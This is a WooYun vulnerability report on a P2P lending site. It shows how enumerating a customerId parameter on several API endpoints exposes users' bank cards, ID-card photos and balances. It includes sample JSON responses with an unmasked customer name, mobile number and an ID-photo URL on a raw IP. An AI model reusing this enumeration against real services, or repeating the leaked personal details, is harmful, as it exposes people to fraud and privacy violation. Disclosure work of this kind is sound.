当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126268

漏洞标题:P2P金融安全之意真金融漏洞可泄露大量用户信息(银行卡号/电话/身份证照片/余额查询等)

相关厂商:意真(上海)金融信息服务有限公司

漏洞作者: Jinone

提交时间:2015-07-13 10:54

修复时间:2015-07-18 10:56

公开时间:2015-07-18 10:56

漏洞类型:网络设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

之前提交了密码重置 给我4rank
现在各种信息全有了。提现还是问题吗?
这个应该是用户的id 14051005
#1. 银行卡号查询
遍历参数 customerId

mask 区域
1.https://**.**.**/esb/account/customer/bankInfo/listcustomerId=14051005&

1.jpg


#2. 身份证照片遍历
看这里,图片的规则先遍历是很难的

mask 区域
1.http://**.**.**/upload/attachment5/14051005/00150001/1432363081128.jpg


但是我们只要通过遍历用户id 就能查看到图片信息。 我这边用burpsutie ,提取出来
#

mask 区域
1.https://**.**.**/esb/account/customer/cardInfo/auditcustomerId=14051005&


访问后是这样的

{
"success" : true,
"message" : "",
"attr" : {
"customerInfo" : {
"name" : null,
"cardId" : null,
"foreUrl" : "",
"foreThumbUrl" : "",
"backUrl" : "",
"backThumbUrl" : "",
"handUrl" : "",
"handThumbUrl" : "",
"status" : ""
},
"cardList" : [ {
"id" : 14098725,
"customerId" : 14051005,
"optSource" : null,
"autid" : 0,
"type" : "00150001",
mask 区域
*****0/upload/attachment5/1405100*****


"subFilePath" : null,

mask 区域
*****00/upload/attachment5/14051*****


"status" : "00210001",
"version" : null,
"createDate" : null,
"creatorId" : null,
"modifyDate" : null,
"modifyerId" : null,
"remark" : null
}, {
"id" : 14098726,
"customerId" : 14051005,
"optSource" : null,
"autid" : 0,
"type" : "00150002",

mask 区域
*****0/upload/attachment5/1405100*****


"subFilePath" : null,

mask 区域
*****00/upload/attachment5/14051*****


"status" : "00210001",
"version" : null,
"createDate" : null,
"creatorId" : null,
"modifyDate" : null,
"modifyerId" : null,
"remark" : null
}, {
"id" : 14098727,
"customerId" : 14051005,
"optSource" : null,
"autid" : 0,
"type" : "00150003",
"storePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150003/1432363081184.jpg",
"subFilePath" : null,

mask 区域
*****00/upload/attachment5/14051*****


"status" : "00210001",
"version" : null,
"createDate" : null,
"creatorId" : null,
"modifyDate" : null,
"modifyerId" : null,
"remark" : null
} ]
}
}


2.jpg

3.jpg


mask 区域
1.http://**.**.**/upload/attachment5/14033105/00150001/1432291395569.jpg


#3. 然后是余额查询

mask 区域
1.https://**.**.**/esb/fortune/customer/accountinfocustomerId=14087605&


# 可以看到有2800

{
"success" : true,
"message" : "",
"attr" : {
"customerAccVo" : {
"customerId" : "14087605",
"mobile" : "13372530130",
"cnName" : "曹金富",
"recomCode" : "w5dhx2",
"status" : "0",
"avlBal" : 0.0,
"credAmount" : 2800.0,
"currPay" : 0.0,
"fortuneAmount" : 0.0,
"currProfit" : 0.0,
"redNum" : 0,
"recomProfits" : 0.0,
"withdrawStatus" : "0",
"myRecomPerson" : null,
"allNotRepayAmt" : 0.0
},
"surplusLuckNum" : 0,
"unReadMsgCount" : 1
}
}

漏洞证明:

之前提交了密码重置 给我4rank
现在各种信息全有了。提现还是问题吗?
这个应该是用户的id 14051005
#1. 银行卡号查询
遍历参数 customerId

mask 区域
1.https://**.**.**/esb/account/customer/bankInfo/listcustomerId=14051005&

1.jpg


#2. 身份证照片遍历
看这里,图片的规则先遍历是很难的

mask 区域
1.http://**.**.**/upload/attachment5/14051005/00150001/1432363081128.jpg


但是我们只要通过遍历用户id 就能查看到图片信息。 我这边用burpsutie ,提取出来
#

mask 区域
1.https://**.**.**/esb/account/customer/cardInfo/auditcustomerId=14051005&


访问后是这样的

{
"success" : true,
"message" : "",
"attr" : {
"customerInfo" : {
"name" : null,
"cardId" : null,
"foreUrl" : "",
"foreThumbUrl" : "",
"backUrl" : "",
"backThumbUrl" : "",
"handUrl" : "",
"handThumbUrl" : "",
"status" : ""
},
"cardList" : [ {
"id" : 14098725,
"customerId" : 14051005,
"optSource" : null,
"autid" : 0,
"type" : "00150001",
mask 区域
*****0/upload/attachment5/1405100*****


"subFilePath" : null,

mask 区域
*****00/upload/attachment5/14051*****


"status" : "00210001",
"version" : null,
"createDate" : null,
"creatorId" : null,
"modifyDate" : null,
"modifyerId" : null,
"remark" : null
}, {
"id" : 14098726,
"customerId" : 14051005,
"optSource" : null,
"autid" : 0,
"type" : "00150002",

mask 区域
*****0/upload/attachment5/1405100*****


"subFilePath" : null,

mask 区域
*****00/upload/attachment5/14051*****


"status" : "00210001",
"version" : null,
"createDate" : null,
"creatorId" : null,
"modifyDate" : null,
"modifyerId" : null,
"remark" : null
}, {
"id" : 14098727,
"customerId" : 14051005,
"optSource" : null,
"autid" : 0,
"type" : "00150003",
"storePath" : "http://140.207.169.83:8000/upload/attachment5/14051005/00150003/1432363081184.jpg",
"subFilePath" : null,

mask 区域
*****00/upload/attachment5/14051*****


"status" : "00210001",
"version" : null,
"createDate" : null,
"creatorId" : null,
"modifyDate" : null,
"modifyerId" : null,
"remark" : null
} ]
}
}


2.jpg

3.jpg


mask 区域
1.http://**.**.**/upload/attachment5/14033105/00150001/1432291395569.jpg


#3. 然后是余额查询

mask 区域
1.https://**.**.**/esb/fortune/customer/accountinfocustomerId=14087605&


# 可以看到有2800

{
"success" : true,
"message" : "",
"attr" : {
"customerAccVo" : {
"customerId" : "14087605",
"mobile" : "13372530130",
"cnName" : "曹金富",
"recomCode" : "w5dhx2",
"status" : "0",
"avlBal" : 0.0,
"credAmount" : 2800.0,
"currPay" : 0.0,
"fortuneAmount" : 0.0,
"currProfit" : 0.0,
"redNum" : 0,
"recomProfits" : 0.0,
"withdrawStatus" : "0",
"myRecomPerson" : null,
"allNotRepayAmt" : 0.0
},
"surplusLuckNum" : 0,
"unReadMsgCount" : 1
}
}

修复方案:

希望尽快修复,不要被不法分子利用了

版权声明:转载请注明来源 Jinone@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-18 10:56

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

2015-09-10:非常感谢,漏洞已处理